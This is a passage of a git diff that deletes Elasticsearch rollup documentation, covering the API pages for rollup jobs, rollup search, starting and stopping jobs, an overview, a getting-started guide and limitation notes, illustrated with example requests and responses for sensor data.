-[[rollup-get-rollup-index-caps-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Data stream or index to check for rollup capabilities. -Wildcard (`*`) expressions are supported. - -[[rollup-get-rollup-index-caps-example]] -==== {api-examples-title} - -Imagine we have an index named `sensor-1` full of raw data. We know that the -data will grow over time, so there will be a `sensor-2`, `sensor-3`, etc. -Let's create a {rollup-job} that stores its data in `sensor_rollup`: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -If at a later date, we'd like to determine what jobs and capabilities were -stored in the `sensor_rollup` index, we can use the get rollup index API: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup/data --------------------------------------------------- -// TEST[continued] - -Note how we are requesting the concrete rollup index name (`sensor_rollup`) as -the first part of the URL. This will yield the following response: - -[source,console-result] ----- -{ - "sensor_rollup" : { - "rollup_jobs" : [ - { - "job_id" : "sensor", - "rollup_index" : "sensor_rollup", - "index_pattern" : "sensor-*", - "fields" : { - "node" : [ - { - "agg" : "terms" - } - ], - "temperature" : [ - { - "agg" : "min" - }, - { - "agg" : "max" - }, - { - "agg" : "sum" - } - ], - "timestamp" : [ - { - "agg" : "date_histogram", - "time_zone" : "UTC", - "fixed_interval" : "1h", - "delay": "7d" - } - ], - "voltage" : [ - { - "agg" : "avg" - } - ] - } - } - ] - } -} ----- - - -The response that is returned contains information that is similar to the -original rollup configuration, but formatted differently. First, there are some -house-keeping details: the {rollup-job} ID, the index that holds the rolled data, -the index pattern that the job was targeting. - -Next it shows a list of fields that contain data eligible for rollup searches. -Here we see four fields: `node`, `temperature`, `timestamp` and `voltage`. Each -of these fields list the aggregations that are possible. For example, you can -use a min, max, or sum aggregation on the `temperature` field, but only a -`date_histogram` on `timestamp`. - -Note that the `rollup_jobs` element is an array; there can be multiple, -independent jobs configured for a single index or index pattern. Each of these -jobs may have different configurations, so the API returns a list of all the -various configurations available. - -Like other APIs that interact with indices, you can specify index patterns -instead of explicit indices: - -[source,console] --------------------------------------------------- -GET /*_rollup/_rollup/data --------------------------------------------------- -// TEST[continued] - diff --git a/docs/reference/rollup/apis/rollup-search.asciidoc b/docs/reference/rollup/apis/rollup-search.asciidoc deleted file mode 100644 index 19bfb125467..00000000000 --- a/docs/reference/rollup/apis/rollup-search.asciidoc +++ /dev/null @@ -1,267 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-search]] -=== Rollup search -++++ -Rollup search -++++ - -Enables searching rolled-up data using the standard query DSL. - -experimental[] - -[[rollup-search-request]] -==== {api-request-title} - -`GET /_rollup_search` - -[[rollup-search-desc]] -==== {api-description-title} - -The rollup search endpoint is needed because, internally, rolled-up documents -utilize a different document structure than the original data. The rollup search -endpoint rewrites standard query DSL into a format that matches the rollup -documents, then takes the response and rewrites it back to what a client would -expect given the original query. - -[[rollup-search-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) -Comma-separated list of data streams and indices used to limit -the request. Wildcard expressions (`*`) are supported. - -This target can include both rollup and non-rollup indices. - -Rules for the `` parameter: - -- At least one data stream, index, or wildcard expression must be specified. -This target can include a rollup or non-rollup index. For data streams, the -stream's backing indices can only serve as non-rollup indices. Omitting the -`` parameter or using `_all` is not permitted. -- Multiple non-rollup indices may be specified. -- Only one rollup index may be specified. If more than one are supplied, an -exception occurs. -- Wildcard expressions may be used, but, if they match more than one rollup index, an -exception occurs. However, you can use an expression to match multiple non-rollup -indices or data streams. --- - -[[rollup-search-request-body]] -==== {api-request-body-title} - -The request body supports a subset of features from the regular Search API. It -supports: - -- `query` param for specifying an DSL query, subject to some limitations -(see <> and <> -- `aggregations` param for specifying aggregations - -Functionality that is not available: - -- `size`: Because rollups work on pre-aggregated data, no search hits can be -returned and so size must be set to zero or omitted entirely. -- `highlighter`, `suggestors`, `post_filter`, `profile`, `explain`: These are -similarly disallowed. - -[[rollup-search-example]] -==== {api-examples-title} - -===== Historical-only search example - -Imagine we have an index named `sensor-1` full of raw data, and we have created -a {rollup-job} with the following configuration: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -This rolls up the `sensor-*` pattern and stores the results in `sensor_rollup`. -To search this rolled up data, we need to use the `_rollup_search` endpoint. -However, you'll notice that we can use regular query DSL to search the rolled-up -data: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "max_temperature": { - "max": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] -// TEST[s/_rollup_search/_rollup_search?filter_path=took,timed_out,terminated_early,_shards,hits,aggregations/] - -The query is targeting the `sensor_rollup` data, since this contains the rollup -data as configured in the job. A `max` aggregation has been used on the -`temperature` field, yielding the following response: - -[source,console-result] ----- -{ - "took" : 102, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "max_temperature" : { - "value" : 202.0 - } - } -} ----- -// TESTRESPONSE[s/"took" : 102/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] - -The response is exactly as you'd expect from a regular query + aggregation; it -provides some metadata about the request (`took`, `_shards`, etc), the search -hits (which is always empty for rollup searches), and the aggregation response. - -Rollup searches are limited to functionality that was configured in the -{rollup-job}. For example, we are not able to calculate the average temperature -because `avg` was not one of the configured metrics for the `temperature` field. -If we try to execute that search: - -[source,console] --------------------------------------------------- -GET sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "avg_temperature": { - "avg": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[catch:/illegal_argument_exception/] - -[source,console-result] ----- -{ - "error": { - "root_cause": [ - { - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - } - ], - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - }, - "status": 400 -} ----- -// TESTRESPONSE[s/"stack_trace": \.\.\./"stack_trace": $body.$_path/] - -===== Searching both historical rollup and non-rollup data - -The rollup search API has the capability to search across both "live" -non-rollup data and the aggregated rollup data. This is done by simply adding -the live indices to the URI: - -[source,console] --------------------------------------------------- -GET sensor-1,sensor_rollup/_rollup_search <1> -{ - "size": 0, - "aggregations": { - "max_temperature": { - "max": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[s/_rollup_search/_rollup_search?filter_path=took,timed_out,terminated_early,_shards,hits,aggregations/] -<1> Note the URI now searches `sensor-1` and `sensor_rollup` at the same time - -When the search is executed, the rollup search endpoint does two things: - -1. The original request is sent to the non-rollup index unaltered. -2. A rewritten version of the original request is sent to the rollup index. - -When the two responses are received, the endpoint rewrites the rollup response -and merges the two together. During the merging process, if there is any overlap -in buckets between the two responses, the buckets from the non-rollup index are -used. - -The response to the above query looks as expected, despite spanning rollup and -non-rollup indices: - -[source,console-result] ----- -{ - "took" : 102, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "max_temperature" : { - "value" : 202.0 - } - } -} ----- -// TESTRESPONSE[s/"took" : 102/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] diff --git a/docs/reference/rollup/apis/start-job.asciidoc b/docs/reference/rollup/apis/start-job.asciidoc deleted file mode 100644 index 28b09375dab..00000000000 --- a/docs/reference/rollup/apis/start-job.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-start-job]] -=== Start {rollup-jobs} API -[subs="attributes"] -++++ -Start {rollup-jobs} -++++ - -Starts an existing, stopped {rollup-job}. - -experimental[] - -[[rollup-start-job-request]] -==== {api-request-title} - -`POST _rollup/job//_start` - -[[rollup-start-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-start-job-desc]] -==== {api-description-title} - -If you try to start a job that does not exist, an exception occurs. If you try -to start a job that is already started, nothing happens. - -[[rollup-start-job-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the {rollup-job}. - -[[rollup-start-job-response-codes]] -==== {api-response-codes-title} - - `404` (Missing resources):: - This code indicates that there are no resources that match the request. It - occurs if you try to start a job that doesn't exist. - -[[rollup-start-job-examples]] -==== {api-examples-title} - -If we have already created a {rollup-job} named `sensor`, it can be started with: - -[source,console] --------------------------------------------------- -POST _rollup/job/sensor/_start --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -Which will return the response: - -[source,console-result] ----- -{ - "started": true -} ----- \ No newline at end of file diff --git a/docs/reference/rollup/apis/stop-job.asciidoc b/docs/reference/rollup/apis/stop-job.asciidoc deleted file mode 100644 index 727981265cb..00000000000 --- a/docs/reference/rollup/apis/stop-job.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-stop-job]] -=== Stop {rollup-jobs} API -[subs="attributes"] -++++ -Stop {rollup-jobs} -++++ - -Stops an existing, started {rollup-job}. - -experimental[] - -[[rollup-stop-job-request]] -==== {api-request-title} - -`POST _rollup/job//_stop` - -[[rollup-stop-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-stop-job-desc]] -===== {api-description-title} - -If you try to stop a job that does not exist, an exception occurs. If you try -to stop a job that is already stopped, nothing happens. - -[[rollup-stop-job-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the {rollup-job}. - -[[rollup-stop-job-query-parms]] -==== {api-query-parms-title} - -`timeout`:: - (Optional, TimeValue) If `wait_for_completion` is `true`, the API blocks for - (at maximum) the specified duration while waiting for the job to stop. If more - than `timeout` time has passed, the API throws a timeout exception. Defaults - to `30s`. -+ --- -NOTE: Even if a timeout exception is thrown, the stop request is still -processing and eventually moves the job to `STOPPED`. The timeout simply means -the API call itself timed out while waiting for the status change. - --- - -`wait_for_completion`:: - (Optional, Boolean) If set to `true`, causes the API to block until the - indexer state completely stops. If set to `false`, the API returns immediately - and the indexer is stopped asynchronously in the background. Defaults to - `false`. - -[[rollup-stop-job-response-codes]] -==== {api-response-codes-title} - -`404` (Missing resources):: - This code indicates that there are no resources that match the request. It - occurs if you try to stop a job that doesn't exist. - -[[rollup-stop-job-examples]] -==== {api-examples-title} - -Since only a stopped job can be deleted, it can be useful to block the API until -the indexer has fully stopped. This is accomplished with the -`wait_for_completion` query parameter, and optionally a `timeout`: - - -[source,console] --------------------------------------------------- -POST _rollup/job/sensor/_stop?wait_for_completion=true&timeout=10s --------------------------------------------------- -// TEST[setup:sensor_started_rollup_job] - -The parameter blocks the API call from returning until either the job has moved -to `STOPPED` or the specified time has elapsed. If the specified time elapses -without the job moving to `STOPPED`, a timeout exception is thrown. diff --git a/docs/reference/rollup/index.asciidoc b/docs/reference/rollup/index.asciidoc deleted file mode 100644 index 99180e2f32d..00000000000 --- a/docs/reference/rollup/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[xpack-rollup]] -== Rolling up historical data - -experimental[] - -Keeping historical data around for analysis is extremely useful but often avoided due to the financial cost of -archiving massive amounts of data. Retention periods are thus driven by financial realities rather than by the -usefulness of extensive historical data. - -// tag::rollup-intro[] -The {stack} {rollup-features} provide a means to summarize and store historical -data so that it can still be used for analysis, but at a fraction of the storage -cost of raw data. -// end::rollup-intro[] - -* <> -* <> -* <> -* <> -* <> -* <> - - -include::overview.asciidoc[] -include::api-quickref.asciidoc[] -include::rollup-getting-started.asciidoc[] -include::understanding-groups.asciidoc[] -include::rollup-agg-limitations.asciidoc[] -include::rollup-search-limitations.asciidoc[] \ No newline at end of file diff --git a/docs/reference/rollup/overview.asciidoc b/docs/reference/rollup/overview.asciidoc deleted file mode 100644 index 1d56b56f0bd..00000000000 --- a/docs/reference/rollup/overview.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-overview]] -=== {rollup-cap} overview -++++ -Overview -++++ - -experimental[] - -Time-based data (documents that are predominantly identified by their timestamp) often have associated retention policies -to manage data growth. For example, your system may be generating 500 documents every second. That will generate -43 million documents per day, and nearly 16 billion documents a year. - -While your analysts and data scientists may wish you stored that data indefinitely for analysis, time is never-ending and -so your storage requirements will continue to grow without bound. Retention policies are therefore often dictated -by the simple calculation of storage costs over time, and what the organization is willing to pay to retain historical data. -Often these policies start deleting data after a few months or years. - -Storage cost is a fixed quantity. It takes X money to store Y data. But the utility of a piece of data often changes -with time. Sensor data gathered at millisecond granularity is extremely useful right now, reasonably useful if from a -few weeks ago, and only marginally useful if older than a few months. - -So while the cost of storing a millisecond of sensor data from ten years ago is fixed, the value of that individual sensor -reading often diminishes with time. It's not useless -- it could easily contribute to a useful analysis -- but it's reduced -value often leads to deletion rather than paying the fixed storage cost. - -[discrete] -==== Rollup stores historical data at reduced granularity - -That's where Rollup comes into play. The Rollup functionality summarizes old, high-granularity data into a reduced -granularity format for long-term storage. By "rolling" the data up into a single summary document, historical data -can be compressed greatly compared to the raw data. - -For example, consider the system that's generating 43 million documents every day. The second-by-second data is useful -for real-time analysis, but historical analysis looking over ten years of data are likely to be working at a larger interval -such as hourly or daily trends. - -If we compress the 43 million documents into hourly summaries, we can save vast amounts of space. The Rollup feature -automates this process of summarizing historical data. - -Details about setting up and configuring Rollup are covered in <> - -[discrete] -==== Rollup uses standard query DSL - -The Rollup feature exposes a new search endpoint (`/_rollup_search` vs the standard `/_search`) which knows how to search -over rolled-up data. Importantly, this endpoint accepts 100% normal {es} Query DSL. Your application does not need to learn -a new DSL to inspect historical data, it can simply reuse existing queries and dashboards. - -There are some limitations to the functionality available; not all queries and aggregations are supported, certain search -features (highlighting, etc) are disabled, and available fields depend on how the rollup was configured. These limitations -are covered more in <>. - -But if your queries, aggregations and dashboards only use the available functionality, redirecting them to historical -data is trivial. - -[discrete] -==== Rollup merges "live" and "rolled" data - -A useful feature of Rollup is the ability to query both "live", realtime data in addition to historical "rolled" data -in a single query. - -For example, your system may keep a month of raw data. After a month, it is rolled up into historical summaries using -Rollup and the raw data is deleted. - -If you were to query the raw data, you'd only see the most recent month. And if you were to query the rolled up data, you -would only see data older than a month. The RollupSearch endpoint, however, supports querying both at the same time. -It will take the results from both data sources and merge them together. If there is overlap between the "live" and -"rolled" data, live data is preferred to increase accuracy. - -[discrete] -==== Rollup is multi-interval aware - -Finally, Rollup is capable of intelligently utilizing the best interval available. If you've worked with summarizing -features of other products, you'll find that they can be limiting. If you configure rollups at daily intervals... your -queries and charts can only work with daily intervals. If you need a monthly interval, you have to create another rollup -that explicitly stores monthly averages, etc. - -The Rollup feature stores data in such a way that queries can identify the smallest available interval and use that -for their processing. If you store rollups at a daily interval, queries can be executed on daily or longer intervals -(weekly, monthly, etc) without the need to explicitly configure a new rollup job. This helps alleviate one of the major -disadvantages of a rollup system; reduced flexibility relative to raw data. - diff --git a/docs/reference/rollup/rollup-agg-limitations.asciidoc b/docs/reference/rollup/rollup-agg-limitations.asciidoc deleted file mode 100644 index 8390c5b80a5..00000000000 --- a/docs/reference/rollup/rollup-agg-limitations.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-agg-limitations]] -=== {rollup-cap} aggregation limitations - -experimental[] - -There are some limitations to how fields can be rolled up / aggregated. This page highlights the major limitations so that -you are aware of them. - -[discrete] -==== Limited aggregation components - -The Rollup functionality allows fields to be grouped with the following aggregations: - -- Date Histogram aggregation -- Histogram aggregation -- Terms aggregation - -And the following metrics are allowed to be specified for numeric fields: - -- Min aggregation -- Max aggregation -- Sum aggregation -- Average aggregation -- Value Count aggregation \ No newline at end of file diff --git a/docs/reference/rollup/rollup-api.asciidoc b/docs/reference/rollup/rollup-api.asciidoc deleted file mode 100644 index a24b85513db..00000000000 --- a/docs/reference/rollup/rollup-api.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-apis]] -== Rollup APIs - -[discrete] -[[rollup-jobs-endpoint]] -=== Jobs - -* <> or <> -* <> or <> -* <> - -[discrete] -[[rollup-data-endpoint]] -=== Data - -* <> -* <> - -[discrete] -[[rollup-search-endpoint]] -=== Search - -* <> - - -include::apis/put-job.asciidoc[] -include::apis/delete-job.asciidoc[] -include::apis/get-job.asciidoc[] -include::apis/rollup-caps.asciidoc[] -include::apis/rollup-index-caps.asciidoc[] -include::apis/rollup-search.asciidoc[] -include::apis/start-job.asciidoc[] -include::apis/stop-job.asciidoc[] \ No newline at end of file diff --git a/docs/reference/rollup/rollup-getting-started.asciidoc b/docs/reference/rollup/rollup-getting-started.asciidoc deleted file mode 100644 index 5ef9b090a61..00000000000 --- a/docs/reference/rollup/rollup-getting-started.asciidoc +++ /dev/null @@ -1,324 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-getting-started]] -=== Getting started with {rollups} -++++ -Getting started -++++ - -experimental[] - -To use the Rollup feature, you need to create one or more "Rollup Jobs". These jobs run continuously in the background -and rollup the index or indices that you specify, placing the rolled documents in a secondary index (also of your choosing). - -Imagine you have a series of daily indices that hold sensor data (`sensor-2017-01-01`, `sensor-2017-01-02`, etc). A sample document might -look like this: - -[source,js] --------------------------------------------------- -{ - "timestamp": 1516729294000, - "temperature": 200, - "voltage": 5.2, - "node": "a" -} --------------------------------------------------- -// NOTCONSOLE - -[discrete] -==== Creating a rollup job - -We'd like to rollup these documents into hourly summaries, which will allow us to generate reports and dashboards with any time interval -one hour or greater. A rollup job might look like this: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "60m" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -We give the job the ID of "sensor" (in the url: `PUT _rollup/job/sensor`), and tell it to rollup the index pattern `"sensor-*"`. -This job will find and rollup any index that matches that pattern. Rollup summaries are then stored in the `"sensor_rollup"` index. - -The `cron` parameter controls when and how often the job activates. When a rollup job's cron schedule triggers, it will begin rolling up -from where it left off after the last activation. So if you configure the cron to run every 30 seconds, the job will process the last 30 -seconds worth of data that was indexed into the `sensor-*` indices. - -If instead the cron was configured to run once a day at midnight, the job would process the last 24 hours worth of data. The choice is largely -preference, based on how "realtime" you want the rollups, and if you wish to process continuously or move it to off-peak hours. - -Next, we define a set of `groups`. Essentially, we are defining the dimensions -that we wish to pivot on at a later date when querying the data. The grouping in -this job allows us to use `date_histogram` aggregations on the `timestamp` field, -rolled up at hourly intervals. It also allows us to run terms aggregations on -the `node` field. - -.Date histogram interval vs cron schedule -********************************** -You'll note that the job's cron is configured to run every 30 seconds, but the date_histogram is configured to -rollup at 60 minute intervals. How do these relate? - -The date_histogram controls the granularity of the saved data. Data will be rolled up into hourly intervals, and you will be unable -to query with finer granularity. The cron simply controls when the process looks for new data to rollup. Every 30 seconds it will see -if there is a new hour's worth of data and roll it up. If not, the job goes back to sleep. - -Often, it doesn't make sense to define such a small cron (30s) on a large interval (1h), because the majority of the activations will -simply go back to sleep. But there's nothing wrong with it either, the job will do the right thing. - -********************************** - -After defining which groups should be generated for the data, you next configure -which metrics should be collected. By default, only the `doc_counts` are -collected for each group. To make rollup useful, you will often add metrics -like averages, mins, maxes, etc. In this example, the metrics are fairly -straightforward: we want to save the min/max/sum of the `temperature` -field, and the average of the `voltage` field. - -.Averages aren't composable?! -********************************** -If you've worked with rollups before, you may be cautious around averages. If an -average is saved for a 10 minute interval, it usually isn't useful for larger -intervals. You cannot average six 10-minute averages to find a hourly average; -the average of averages is not equal to the total average. - -For this reason, other systems tend to either omit the ability to average or -store the average at multiple intervals to support more flexible querying. - -Instead, the {rollup-features} save the `count` and `sum` for the defined time -interval. This allows us to reconstruct the average at any interval greater-than -or equal to the defined interval. This gives maximum flexibility for minimal -storage costs... and you don't have to worry about average accuracies (no -average of averages here!) -********************************** - -For more details about the job syntax, see <>. - -After you execute the above command and create the job, you'll receive the following response: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- - -[discrete] -==== Starting the job - -After the job is created, it will be sitting in an inactive state. Jobs need to be started before they begin processing data (this allows -you to stop them later as a way to temporarily pause, without deleting the configuration). - -To start the job, execute this command: - -[source,console] --------------------------------------------------- -POST _rollup/job/sensor/_start --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -[discrete] -==== Searching the rolled results - -After the job has run and processed some data, we can use the <> endpoint to do some searching. The Rollup feature is designed -so that you can use the same Query DSL syntax that you are accustomed to... it just happens to run on the rolled up data instead. - -For example, take this query: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "max_temperature": { - "max": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] - -It's a simple aggregation that calculates the maximum of the `temperature` field. But you'll notice that is is being sent to the `sensor_rollup` -index instead of the raw `sensor-*` indices. And you'll also notice that it is using the `_rollup_search` endpoint. Otherwise the syntax -is exactly as you'd expect. - -If you were to execute that query, you'd receive a result that looks like a normal aggregation response: - -[source,console-result] ----- -{ - "took" : 102, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "max_temperature" : { - "value" : 202.0 - } - } -} ----- -// TESTRESPONSE[s/"took" : 102/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] - -The only notable difference is that Rollup search results have zero `hits`, because we aren't really searching the original, live data any -more. Otherwise it's identical syntax. - -There are a few interesting takeaways here. Firstly, even though the data was rolled up with hourly intervals and partitioned by -node name, the query we ran is just calculating the max temperature across all documents. The `groups` that were configured in the job -are not mandatory elements of a query, they are just extra dimensions you can partition on. Second, the request and response syntax -is nearly identical to normal DSL, making it easy to integrate into dashboards and applications. - -Finally, we can use those grouping fields we defined to construct a more complicated query: - -[source,console] --------------------------------------------------- -GET /sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "timeline": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "7d" - }, - "aggs": { - "nodes": { - "terms": { - "field": "node" - }, - "aggs": { - "max_temperature": { - "max": { - "field": "temperature" - } - }, - "avg_voltage": { - "avg": { - "field": "voltage" - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] - -Which returns a corresponding response: - -[source,console-result] ----- -{ - "took" : 93, - "timed_out" : false, - "terminated_early" : false, - "_shards" : ... , - "hits" : { - "total" : { - "value": 0, - "relation": "eq" - }, - "max_score" : 0.0, - "hits" : [ ] - }, - "aggregations" : { - "timeline" : { - "meta" : { }, - "buckets" : [ - { - "key_as_string" : "2018-01-18T00:00:00.000Z", - "key" : 1516233600000, - "doc_count" : 6, - "nodes" : { - "doc_count_error_upper_bound" : 0, - "sum_other_doc_count" : 0, - "buckets" : [ - { - "key" : "a", - "doc_count" : 2, - "max_temperature" : { - "value" : 202.0 - }, - "avg_voltage" : { - "value" : 5.1499998569488525 - } - }, - { - "key" : "b", - "doc_count" : 2, - "max_temperature" : { - "value" : 201.0 - }, - "avg_voltage" : { - "value" : 5.700000047683716 - } - }, - { - "key" : "c", - "doc_count" : 2, - "max_temperature" : { - "value" : 202.0 - }, - "avg_voltage" : { - "value" : 4.099999904632568 - } - } - ] - } - } - ] - } - } -} - ----- -// TESTRESPONSE[s/"took" : 93/"took" : $body.$_path/] -// TESTRESPONSE[s/"_shards" : \.\.\. /"_shards" : $body.$_path/] - -In addition to being more complicated (date histogram and a terms aggregation, plus an additional average metric), you'll notice -the date_histogram uses a `7d` interval instead of `60m`. - -[discrete] -==== Conclusion - -This quickstart should have provided a concise overview of the core functionality that Rollup exposes. There are more tips and things -to consider when setting up Rollups, which you can find throughout the rest of this section. You may also explore the <> -for an overview of what is available. diff --git a/docs/reference/rollup/rollup-search-limitations.asciidoc b/docs/reference/rollup/rollup-search-limitations.asciidoc deleted file mode 100644 index adc597d02e9..00000000000 --- a/docs/reference/rollup/rollup-search-limitations.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-search-limitations]] -=== {rollup-cap} search limitations - -experimental[] - -While we feel the Rollup function is extremely flexible, the nature of summarizing data means there will be some limitations. Once -live data is thrown away, you will always lose some flexibility. - -This page highlights the major limitations so that you are aware of them. - -[discrete] -==== Only one {rollup} index per search - -When using the <> endpoint, the `index` parameter accepts one or more indices. These can be a mix of regular, non-rollup -indices and rollup indices. However, only one rollup index can be specified. The exact list of rules for the `index` parameter are as -follows: - -- At least one index/index-pattern must be specified. This can be either a rollup or non-rollup index. Omitting the index parameter, -or using `_all`, is not permitted -- Multiple non-rollup indices may be specified -- Only one rollup index may be specified. If more than one are supplied an exception will be thrown -- Index patterns may be used, but if they match more than one rollup index an exception will be thrown. - -This limitation is driven by the logic that decides which jobs are the "best" for any given query. If you have ten jobs stored in a single -index, which cover the source data with varying degrees of completeness and different intervals, the query needs to determine which set -of jobs to actually search. Incorrect decisions can lead to inaccurate aggregation results (e.g. over-counting doc counts, or bad metrics). -Needless to say, this is a technically challenging piece of code. - -To help simplify the problem, we have limited search to just one rollup index at a time (which may contain multiple jobs). In the future we -may be able to open this up to multiple rollup jobs. - -[discrete] -[[aggregate-stored-only]] -==== Can only aggregate what's been stored - -A perhaps obvious limitation, but rollups can only aggregate on data that has been stored in the rollups. If you don't configure the -rollup job to store metrics about the `price` field, you won't be able to use the `price` field in any query or aggregation. - -For example, the `temperature` field in the following query has been stored in a rollup job... but not with an `avg` metric. Which means -the usage of `avg` here is not allowed: - -[source,console] --------------------------------------------------- -GET sensor_rollup/_rollup_search -{ - "size": 0, - "aggregations": { - "avg_temperature": { - "avg": { - "field": "temperature" - } - } - } -} --------------------------------------------------- -// TEST[setup:sensor_prefab_data] -// TEST[catch:/illegal_argument_exception/] - -The response will tell you that the field and aggregation were not possible, because no rollup jobs were found which contained them: - -[source,console-result] ----- -{ - "error": { - "root_cause": [ - { - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - } - ], - "type": "illegal_argument_exception", - "reason": "There is not a rollup job that has a [avg] agg with name [avg_temperature] which also satisfies all requirements of query.", - "stack_trace": ... - }, - "status": 400 -} ----- -// TESTRESPONSE[s/"stack_trace": \.\.\./"stack_trace": $body.$_path/] - -[discrete] -==== Interval granularity - -Rollups are stored at a certain granularity, as defined by the `date_histogram` group in the configuration. This means you -can only search/aggregate the rollup data with an interval that is greater-than or equal to the configured rollup interval. - -For example, if data is rolled up at hourly intervals, the <> API can aggregate on any time interval -hourly or greater. Intervals that are less than an hour will throw an exception, since the data simply doesn't -exist for finer granularities. - -[[rollup-search-limitations-intervals]] -.Requests must be multiples of the config -********************************** -Perhaps not immediately apparent, but the interval specified in an aggregation request must be a whole -multiple of the configured interval. If the job was configured to rollup on `3d` intervals, you can only -query and aggregate on multiples of three (`3d`, `6d`, `9d`, etc). - -A non-multiple wouldn't work, since the rolled up data wouldn't cleanly "overlap" with the buckets generated -by the aggregation, leading to incorrect results. - -For that reason, an error is thrown if a whole multiple of the configured interval isn't found. -********************************** - -Because the RollupSearch endpoint can "upsample" intervals, there is no need to configure jobs with multiple intervals (hourly, daily, etc). -It's recommended to just configure a single job with the smallest granularity that is needed, and allow the search endpoint to upsample -as needed. - -That said, if multiple jobs are present in a single rollup index with varying intervals, the search endpoint will identify and use the job(s) -with the largest interval to satisfy the search request. - -[discrete] -==== Limited querying components - -The Rollup functionality allows `query`'s in the search request, but with a limited subset of components. The queries currently allowed are: - -- Term Query -- Terms Query -- Range Query -- MatchAll Query -- Any compound query (Boolean, Boosting, ConstantScore, etc) - -Furthermore, these queries can only use fields that were also saved in the rollup job as a `group`. -If you wish to filter on a keyword `hostname` field, that field must have been configured in the rollup job under a `terms` grouping. - -If you attempt to use an unsupported query, or the query references a field that wasn't configured in the rollup job, an exception will be -thrown. We expect the list of support queries to grow over time as more are implemented. 